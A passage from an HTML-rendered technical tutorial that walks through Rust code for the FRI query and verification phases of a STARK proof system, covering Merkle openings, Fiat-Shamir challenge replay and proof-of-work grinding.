&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; (Vec&amp;lt;FriDecommitment&amp;lt;F&amp;gt;&amp;gt;, Vec&amp;lt;usize&amp;gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsFFTField,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    A: AIR&amp;lt;Field = F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    T: Transcript,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if !fri_layers.is_empty() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let number_of_queries = air.options().fri_number_of_queries;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let iotas = (0..number_of_queries)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .map(|_| (transcript_to_u32(transcript) as usize) % domain_size)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .collect::&amp;lt;Vec&amp;lt;usize&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let query_list = iotas&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .map(|iota_s| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Receive challenge 𝜄ₛ (iota_s)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let mut layers_auth_paths_sym = vec![];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let mut layers_evaluations_sym = vec![];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let mut layers_evaluations = vec![];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                let mut layers_auth_paths = vec![];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                for layer in fri_layers {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    &#x2F;&#x2F; symmetric element&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let index = iota_s % layer.domain_size;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let index_sym = (iota_s + layer.domain_size &#x2F; 2) % layer.domain_size;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let evaluation_sym = layer.evaluation[index_sym].clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let auth_path_sym = layer.merkle_tree.get_proof_by_pos(index_sym).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let evaluation = layer.evaluation[index].clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let auth_path = layer.merkle_tree.get_proof_by_pos(index).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_auth_paths_sym.push(auth_path_sym);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_evaluations_sym.push(evaluation_sym);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_evaluations.push(evaluation);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_auth_paths.push(auth_path);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                FriDecommitment {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_auth_paths_sym,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_evaluations_sym,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_evaluations,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    layers_auth_paths,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (query_list, iotas)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        (vec![], vec![])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In line 15, we sample all the indexes to open in the Merkle tree belonging to $p_0 (x)$. We reduce each sample modulo the domain size to ensure the queries fall in range. Once we have all the indexes to query, we can iterate over them as in line 18 (in this case, we could do it in parallel). For each index, we go through each FriLayer and get the indexes for $p_k ( u )$ and $p_k ( - u)$ (by taking the remainder of the current index modulo the domain size of the FriLayer), as in lines 29 and 30, and then take the values of the leaves in the Merkle tree (lines 31 and 33), together with the corresponding authentication paths (lines 32 and 34). We then add each to the vectors containing the evaluations and authentication paths for each query. Finally, we get the complete list of queries and all the necessary values.&lt;&#x2F;p&gt;
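&lt;p&gt;The index bookkeeping described above can be sketched with a small standalone helper (a hypothetical function for illustration, not the library&amp;#39;s API): reduce the sampled index modulo the layer&amp;#39;s domain size, and offset by half the domain to reach the symmetric point $-u$.&lt;&#x2F;p&gt;

```rust
// Hypothetical sketch of the per-layer index derivation: each FRI layer
// halves the domain, so layer k has size 2^(lde_root_order - k). The index
// for p_k(u) is the query index reduced modulo that size, and the index for
// p_k(-u) sits half a domain away.
fn layer_indexes(iota: usize, lde_root_order: u32, layer: u32) -> (usize, usize) {
    let domain_size = 1usize << (lde_root_order - layer);
    let index = iota % domain_size;
    let index_sym = (index + domain_size / 2) % domain_size;
    (index, index_sym)
}

fn main() {
    // Toy example: initial domain of size 2^4 = 16, query index 13.
    for k in 0..3 {
        let (i, i_sym) = layer_indexes(13, 4, k);
        println!("layer {k}: index {i}, symmetric index {i_sym}");
    }
}
```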
&lt;h2 id=&quot;verification&quot;&gt;Verification&lt;&#x2F;h2&gt;
&lt;p&gt;If a verifier wants to check our work, he needs to verify both the inclusion proofs (showing that all values belong to the Merkle trees) and that each layer is obtained from the previous one, until we reach degree zero. Since the protocol was made non-interactive, the verifier must replay the transcript to re-derive all the random $\beta_k$. We will only focus on the FRI part, but remember that in a general STARK prover, we have more work before that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let merkle_roots = &amp;amp;proof.fri_layers_merkle_roots;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let zetas = merkle_roots&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|root| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Receive commitment: [pₖ] (the first one is [p₀])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            transcript.append(root);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; &amp;gt;&amp;gt;&amp;gt;&amp;gt; Send challenge 𝜁ₖ&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            transcript_to_field(transcript)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Receive value: pₙ&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;proof.fri_last_value.to_bytes_be());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Receive grinding value&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; 1) Receive challenge from the transcript&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let transcript_challenge = transcript.challenge();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let nonce = proof.nonce;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let leading_zeros_count =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        hash_transcript_with_int_and_get_leading_zeros(&amp;amp;transcript_challenge, nonce);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transcript.append(&amp;amp;nonce.to_be_bytes());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; FRI query phase&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; &amp;lt;&amp;lt;&amp;lt;&amp;lt; Send challenges 𝜄ₛ (iota_s)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let iota_max: usize = 2_usize.pow(domain.lde_root_order);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let iotas: Vec&amp;lt;usize&amp;gt; = (0..air.options().fri_number_of_queries)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|_| (transcript_to_u32(transcript) as usize) % iota_max)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The verifier appends the root of each Merkle tree to the transcript, one at a time, and gets the value of each $\beta_k$ (lines 2 to 11). Then, the verifier adds the final value of the FRI protocol (line 14). If there is proof of work, the verifier, having already checked that the provided nonce is correct, appends the nonce to the transcript and samples all the indexes.&lt;&#x2F;p&gt;
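&lt;p&gt;The grinding check can be sketched as follows. This is only an illustration of the mechanism behind &lt;code&gt;hash_transcript_with_int_and_get_leading_zeros&lt;&#x2F;code&gt;: the standard library&amp;#39;s SipHash-based hasher stands in for the real transcript hash, so none of this is the actual implementation.&lt;&#x2F;p&gt;

```rust
// Illustrative proof-of-work (grinding) sketch: hash the transcript
// challenge together with a nonce and count the leading zero bits of the
// digest. The prover searches for a nonce; the verifier checks it with a
// single hash evaluation. DefaultHasher is a stand-in, not the real hash.
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

fn leading_zeros(challenge: &[u8], nonce: u64) -> u32 {
    let mut hasher = DefaultHasher::new();
    challenge.hash(&mut hasher);
    nonce.hash(&mut hasher);
    hasher.finish().leading_zeros()
}

fn main() {
    let challenge = b"transcript state";
    let required_bits = 8;
    // The prover grinds nonces until the hash clears the threshold...
    let nonce = (0u64..)
        .find(|&n| leading_zeros(challenge, n) >= required_bits)
        .unwrap();
    // ...and the verifier recomputes one hash to check the claim.
    assert!(leading_zeros(challenge, nonce) >= required_bits);
    println!("nonce {nonce} clears {required_bits} bits of grinding");
}
```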
&lt;p&gt;With this, the verifier can proceed to check all queries,&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn verify_fri&amp;lt;F, A&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;StarkProof&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    challenges: &amp;amp;Challenges&amp;lt;F, A&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; bool&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsFFTField,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    A: AIR&amp;lt;Field = F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; verify FRI&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let two_inv = &amp;amp;FieldElement::from(2).inv();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut evaluation_point_inverse = challenges&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iotas&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|iota| &amp;amp;domain.lde_roots_of_unity_coset[*iota])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .cloned()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect::&amp;lt;Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt;&amp;gt;();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement::inplace_batch_inverse(&amp;amp;mut evaluation_point_inverse);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .query_list&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(&amp;amp;challenges.iotas)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(evaluation_point_inverse)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .fold(true, |mut result, ((proof_s, iota_s), eval)| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F;This is done in constant time&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            result &amp;amp;= verify_query_and_sym_openings(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                proof,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &amp;amp;challenges.zetas,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                *iota_s,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                proof_s,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                domain,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                eval,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                two_inv,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            result&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In this function, the verifier receives the FriDecommitments (contained in the StarkProof), the domain $D_0$ (which includes all evaluation points), and the challenges (indexes) sampled by replaying what the prover did. Lines 12 to 19 are performance optimizations, where the verifier computes the inverses of the evaluation points in batch (turning the divisions into cheaper multiplications). Then, the verifier proceeds to check each query. The function &lt;code&gt;verify_query_and_sym_openings&lt;&#x2F;code&gt; has the following code:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn verify_query_and_sym_openings&amp;lt;F: IsField + IsFFTField&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof: &amp;amp;StarkProof&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    zetas: &amp;amp;[FieldElement&amp;lt;F&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    iota: usize,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fri_decommitment: &amp;amp;FriDecommitment&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    domain: &amp;amp;Domain&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    evaluation_point: FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    two_inv: &amp;amp;FieldElement&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; bool&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    FieldElement&amp;lt;F&amp;gt;: ByteConversion,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let fri_layers_merkle_roots = &amp;amp;proof.fri_layers_merkle_roots;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let evaluation_point_vec: Vec&amp;lt;FieldElement&amp;lt;F&amp;gt;&amp;gt; =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        core::iter::successors(Some(evaluation_point), |evaluation_point| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            Some(evaluation_point.square())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .take(fri_layers_merkle_roots.len())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut v = fri_decommitment.layers_evaluations[0].clone();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; For each fri layer merkle proof check:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; That each merkle path verifies&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Sample beta with fiat shamir&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Compute v = [P_i(z_i) + P_i(-z_i)] &#x2F; 2 + beta * [P_i(z_i) - P_i(-z_i)] &#x2F; (2 * z_i)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Where P_i is the folded polynomial of the i-th fiat shamir round&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; z_i is obtained from the first z (that was derived through Fiat-Shamir) through a known calculation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; The calculation is, given the index, index % length_of_evaluation_domain&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Check that v = P_{i+1}(z_i)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; For each (merkle_root, merkle_auth_path) &#x2F; fold&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; With the auth path containing the element that the path proves its existence&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fri_layers_merkle_roots&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .enumerate()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(&amp;amp;fri_decommitment.layers_auth_paths)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .zip(&amp;amp;fri_decommitment.layers_evaluations)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
